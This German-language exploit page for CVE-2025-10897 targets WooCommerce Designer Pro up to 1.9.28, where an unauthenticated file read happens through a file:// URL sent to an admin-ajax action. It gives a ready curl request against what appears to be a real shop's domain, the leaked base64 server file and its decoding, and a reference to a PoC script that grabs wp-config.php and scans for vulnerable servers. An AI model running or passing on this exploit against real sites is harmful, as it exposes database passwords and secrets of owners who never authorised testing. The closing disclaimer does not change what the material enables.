
WooCommerce Designer Pro <= 1.9.28 - Nicht authentifiziertes Lesen beliebiger Dateien
WooCommerce ist ein Open-Source-E-Commerce-Plugin für WordPress, das Websites in Online-Shops verwandelt. WooCommerce Designer Pro ist ein WordPress-Plugin von JMA Plugins, das Kunden ermöglicht, Produkte direkt in WooCommerce-Shops zu designen und anzupassen.
WICHTIG: WooCommerce und WooCommerce Designer Pro sind vollständig verschiedene Produkte.
WooCommerce Designer Pro unterstützt die Erstellung von Visitenkarten, Postkarten, Flyern, Postern, T-Shirts, Aufklebern und anderen bedruckbaren Materialien mit Funktionen wie CMYK-Farbunterstützung, PDF-Erzeugung und einer canvasbasierten Designoberfläche. Das Plugin integriert sich in WooCommerce, um eine Echtzeit-Produktanpassung vor dem Kauf zu ermöglichen, was es für Online-Druckereien und Shops mit individuellen Merchandise-Artikeln geeignet macht.
CVE-2025-10897 ist ein nicht authentifiziertes beliebiges Dateilesen (Arbitrary File Read) in WooCommerce
Designer Pro bis Version 1.9.28 (CWE-22). Ein Angreifer sendet
mit und
einer -URL, die auf Serverdateien wie oder
zeigt. Das Plugin gibt den Dateiinhalt in der JSON-Antwort zurück.
Dies kann Datenbankpasswörter und andere Geheimnisse aus
ohne ein WordPress-Konto preisgeben.
POST /wp-admin/admin-ajax.phpaction=wcdp_convert_resource_cmykfile:///etc/passwdwp-config.phpwp-config.phpANFRAGE
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
ANTWORT
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}
Base64-dekodierte Antwort:
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
HINWEIS: Unser PoC-Skript versucht, die wp-config.php zu lesen, aber das Ziel könnte
WordPress an einem anderen Ort als /var/www installiert haben.
Argumente zur Suche nach verwundbaren Servern
Dieses Repository und seine Inhalte werden ausschließlich für legitime Sicherheitsforschung, autorisierte Penetrationstests, pädagogische Studien und defensive Zwecke bereitgestellt. Durch den Zugriff auf oder die Nutzung dieses Materials erkennen Sie die volle Verantwortung dafür an, dass Ihre Aktivitäten allen geltenden Gesetzen entsprechen und dass Sie eine ordnungsgemäße Genehmigung eingeholt haben, bevor Sie diese Techniken gegen ein System testen oder anwenden, das Ihnen nicht gehört.
Die Autoren und Betreuer dieses Projekts übernehmen keinerlei Haftung für Schäden, rechtliche Konsequenzen oder Missbrauch, die sich aus der Anwendung dieser Informationen ergeben. Jegliche Nutzung für unbefugten Zugriff, böswillige Aktivitäten oder illegale Zwecke ist ausdrücklich untersagt und wird nicht unterstützt.
Nutzen Sie es verantwortungsvoll. Bleiben Sie legal. Testen Sie nur, was Ihnen gehört oder wofür Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
SCT-PL